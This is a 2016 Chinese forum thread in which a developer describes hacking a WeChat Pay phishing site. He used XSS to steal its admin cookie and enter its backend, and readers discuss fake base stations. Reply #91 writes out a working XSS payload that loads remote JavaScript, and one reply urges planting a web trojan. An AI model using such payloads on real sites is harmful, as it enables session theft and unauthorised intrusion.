这是一个创建于 3248 天前的主题,其中的信息可能已经有所发展或是发生改变。
昨天在微信官网上申请微信支付,今天下午就收到了一条短信
于是我就点开了这个链接,发现是 asp 后缀的,腾讯应该搞 php 的啊,我于是就发现有点不对头,我就往里面来了一发 xss 代码。
不一会儿就搞到了 cookie, 登录后台一看。。
第 1 条附言 2016-12-21 09:38:42 +08:00
各位,应该是伪基站发送的,我查了下移动的短信详单, 没有 95017 的电话号码:
移动的短信详单:
我的手机收到的短信:
(我的手机还"智能"的给短信加了 logo )
移动的短信详单:
我的手机收到的短信:
(我的手机还"智能"的给短信加了 logo ) | 1 Showfom PRO 只能说有些人太好骗了 |
 | 2 SourceMan 2016-12-20 13:57:22 +08:00 火钳刘明 这个是大新闻 |
 | 3 kimwang 2016-12-20 14:00:31 +08:00 "放蛇“(钓鱼执法) …… |
 | 4 TangMonk OP  102 我现在已经把上面被盗的信息全部给他删完了。。 |
 | 5 icodesign &nbp;2016-12-20 14:01:17 +08:00 取款密码...... |
 | 6 HGladIator 2016-12-20 14:02:47 +08:00 via iPhone 第一眼就看到了域名错误。 |
| 7 TangMonk OP 查了下 whois ,貌似是在上海祥和路,电话: 0215822656 , qq: 395849573958 |
 | 8 HFX3389 2016-12-20 14:05:37 +08:00 我只说两个字,求教。 |
 | 10 sorcerer 2016-12-20 14:08:57 +08:00 via iPhone 他在哪个页面中了你的 xss |
 | 11 mrjoel 2016-12-20 14:15:11 +08:00 所以说啊,还是老老实实用 PHP |
 | 13 |
 | 14 815lbh 2016-12-20 14:28:35 +08:00 大哥,受我一拜,好人啊。() |
 | 16 hlg002 2016-12-20 14:36:08 +08:00 求教程 |
 | 17 wenymedia 2016-12-20 14:40:54 +08:00 via Android 楼主干的漂亮 感觉把对方服务器肉鸡了 或者重定向到某榴… 更刺鸡 |
| 18 TangMonk OP @hlg002 https://www.google.com/search?q=xss+%E6%95%99%E7%A8%8B&{google:acceptedSuggestion}oq=xss+%E6%95%99%E7%A8%8B&aqs=chrome..69i57.2076j0j7&sourceid=chrome&ie=UTF-8 |
 | 19 hnnxn 2016-12-20 14:44:16 +08:00 via Android 楼主好人 |
 | 20 x86 2016-12-20 14:47:22 +08:00 1 php 我学还不行吗 |
 | 22 zhang1215 2016-12-20 14:51:00 +08:00 楼主 666 ,再低劣的骗术也有人中招 |
 | 23 phieo 2016-12-20 14:53:51 +08:00 顶楼主 现在社会需要你这样正直的人 |
 | 26 KenGe 2016-12-20 15:00:57 +08:00 你用了 wifi 没还是用的自己的网络? |
 | 27 asdwddd 2016-12-20 15:01:55 +08:00 大家跟进看什么原因 |
 | 30 CerealKiller 2016-12-20 15:09:40 +08:00 via iPhone 看网址 应该能看出不对头……学习了 |
 | 31 Felldeadbird 2016-12-20 15:14:40 +08:00 哈哈,骗子反被楼主骗了。 骗子:哼哼哼,骗子! |
 | 32 jiangzhuo 2016-12-20 15:23:14 +08:00 95017 确实是腾讯的客服电话吧。城里套路真是深啊 |
 | 33 marsLeo 2016-12-20 15:33:08 +08:00 如果你在收到短信前,有短时间手机突然没信号,那有可能是伪基站发的短信。 |
 | 34 jacy 2016-12-20 16:05:41 +08:00 数据库挂了还是本来就会错误 |
 | 35 mgna17 2016-12-20 16:08:01 +08:00 via iPhone Microsoft JET Database Engine 错误 '80004005' 未指定的错误 /include/db_conn.asp ,行 36 他的数据库被人玩坏了。。。 |
 | 37 subpo PRO 问题是...95017 确实是微信的客服号码,这个怎么弄的? |
 | 41 smallaccount 2016-12-20 17:21:24 +08:00 楼主做了一件大好事。 |
 | 42 WhyAreYouSoSad 2016-12-20 17:25:14 +08:00 3 马云:祝各位阿 sir 在警察部一帆风顺。干杯! |
 | 43 hack 2016-12-20 17:49:05 +08:00 via Android 太暴力,后台登录挂个网马撸出来片或者视频最好 |
 | 44 hahiru 2016-12-20 17:49:53 +08:00 via Android 伪基站的话应该是撒网捞鱼的。碰巧遇到楼主,腾讯背了锅。 |
 | 47 f1r1ng 2016-12-20 18:01:27 +08:00 是不是手机里软件有问题。。 |
 | 48 dreamwar 2016-12-20 18:08:38 +08:00 基站伪装 |
 | 49 ming2050 2016-12-20 18:16:52 +08:00 via iPhone 这个重点不是内鬼 |
 | 50 dahvlh 2016-12-20 18:19:59 +08:00 = =,伪基站 去科技园撒网 专门调微信开发者... 这不太现实吧 而且注册也就一次的事情 得到微信内部查查是谁卖的了 |
 | 51 basefas 2016-12-20 18:29:38 +08:00 via iPhone 没有人吐槽“登陆”的么(滑稽) |
 | 53 nfroot 2016-12-20 18:39:51 +08:00 @basefas 这货跟我一样,登陆和登录拼音输入法打出哪个用哪个……而且后台没过滤 XSS (我也是填表的时候做过滤……) 看来后台做个防止载入其他站点资源的那个功能是完全有必要的,我以前也想到说如果别人 XSS 我后台……后台地址藏好了也随时暴露…… |
 | 55 ahkxhyl 2016-12-20 18:44:19 +08:00 我去 贴主~很 知道放 xss~~ 不仔细看 真的以为是腾讯发来的~~ |
 | 57 zhouyg 2016-12-20 18:53:48 +08:00 牛掰,果然 php 才是王道。 |
 | 59 Patrick95 2016-12-20 19:07:03 +08:00 应该是伪基站群发了短信,恰好赶上你微信支付了。 |
 | 60 TimePPT PRO 围观 |
 | 62 NaturalColour 2016-12-20 19:31:29 +08:00 厉害了我的楼主 |
 | 63 Quaintjade 2016-12-20 19:51:29 +08:00 via Android 可以查一下详单来分辨是不是伪基站,注意短彩信和增值业务都要查,因为有些增值业务也能发短信。 |
 | 64 cwz326237076 2016-12-20 19:52:02 +08:00 via Android wap.weixtqq.com 这不摆明说是假的么 |
| 65 ahkxhyl 2016-12-20 19:59:38 +08:00 层主说的对 感觉有点像伪基站发的~~ |
 | 66 j8sec 2016-12-20 20:27:26 +08:00 1 腾讯企业验证费用和验证是交给第三方做的, 这个第三方有重大嫌疑 |
 | 68 terence4444 2016-12-20 20:34:10 +08:00 via iPhone 过两天去查详单 看看到底是不是伪基站 |
 | 69 wclebb 2016-12-20 20:37:36 +08:00 via iPhone 申请微信支付有可能不是腾讯,而是第三方审核所在的公司。 |
 | 70 Tink PRO 强,无敌! |
 | 71 shingoxray 2016-12-20 20:48:28 +08:00 Good job !事关广大人民群众安全,建议向当地公安报案,并向腾讯安全应急响应中心报告。 |
 | 72 RobertYang 2016-12-20 21:58:44 +08:00 via Android 哈哈哈 干的漂亮 |
 | 73 Aidea 2016-12-20 22:58:12 +08:00 厉害,自己还是要加强学习啊~ |
 | 74 gotonba 2016-12-20 23:53:53 +08:00 难怪现在可以通过对公账户打款来验证,看来第三方确实不安全,还得交 300 大洋=。= |
 | 75 jedihy 2016-12-20 23:55:14 +08:00 via iPhone 能不能写写入侵流程 |
 | 76 jookr 2016-12-21 00:52:36 +08:00 [建议] 1 、用个插件自定义你的 UA (例如插入几个字符),大家写后台的时候在统一入口验证 UA 如果不包含那几个字符就 404 ,这样能防止 XSS 。 https://ext.se.360.cn/webstore/search/魔变 2 、 session 保存登录的 ip ,每个后台页面打开都判断当前 IP 是否等于登录时记得那个 IP 。 求还有什么方法或者更简便的方法防止被 XSS |
 | 77 onionnews 2016-12-21 08:49:41 +08:00 via Android 如果是伪基站的话,怎么知道谁刚刚开通微信支付,刚好受害者周围部署了伪基站? |
 | 78 lxrmido 2016-12-21 08:55:55 +08:00 说起伪基站,大学时有一阵子只要发查询剩余流量的短信(移动卡)就会收到电信上网卡的推销短信…… |
| 80 TangMonk OP 楼上的各位,应该是伪基站发送的,我查了下移动的短信详单, 没有 95017 的电话号码: 移动的短信详单: 我的手机收到的短信: (我的手机还"智能"的给短信加了 logo ) |
 | 82 sola97 2016-12-21 09:44:32 +08:00 有没有 xss 代码供学习一下 |
 | 83 tairan2006 2016-12-21 10:10:55 +08:00 楼主好样的,佩服 |
 | 84 hoythan 2016-12-21 10:17:16 +08:00 能不能提供一下你的 xss 代码学习一下. |
 | 85 mazyi PRO 厉害啊厉害,随手注入了一下~ |
| 86 TangMonk OP 1 |
 | 88 BakCshi 2016-12-21 10:32:25 +08:00 去知乎发个帖,搞个大新闻 |
 | 89 nevermlnd 2016-12-21 10:36:57 +08:00 如果是 iPhone 的截图 回更有说服力 |
 | 90 ljcarsenal 2016-12-21 11:17:29 +08:00 @TangMonk 你这个代码直接通过用户名输入框输入进去的? 服务端和网页限制一下输入长度是不是就没用了 |
| 91 TangMonk OP @ljcarsenal 不是,这只是一个 js 链接包含的内容而已,输入框里面填写 <img src=x Onerror=s=createElement('script');body.appendChild(s);s.src='你的 js 地址';> |
 | 92 wavingclear 2016-12-21 12:15:57 +08:00 via iPad 应该是伪基站,想骗普通吃瓜群众,骗到程序员是因为他倒霉 |
 | 93 sutking 2016-12-21 12:21:36 +08:00 via iPhone 第一眼就发现域名有问题啊 |
| 94 sutking 2016-12-21 12:24:05 +08:00 via iPhone 你看这 whois ,绝对坑你没商量  |
 | 95 yamen 2016-12-21 13:12:01 +08:00 我不懂,但我觉得你用的是安卓吧? |
 | 96 fengjianxinghun 2016-12-21 13:15:28 +08:00 nice !干得不错 |
 | 97 choury 2016-12-21 13:22:45 +08:00 这个是针对个人的微信支付来诈骗的吧,任何人收到都可能受骗啊,基本有微信的都开了微信支付吧,只是你收到短信的时间比较巧吧 |
 | 98 zhangsimon 2016-12-21 13:37:33 +08:00 你的手机什么 rom !!! 太干扰人了 |
| 99 TangMonk OP @zhangsimon 一加 2 。。氢 os |
 | 100 samtoto 2016-12-21 13:50:12 +08:00 next page> |
Select Language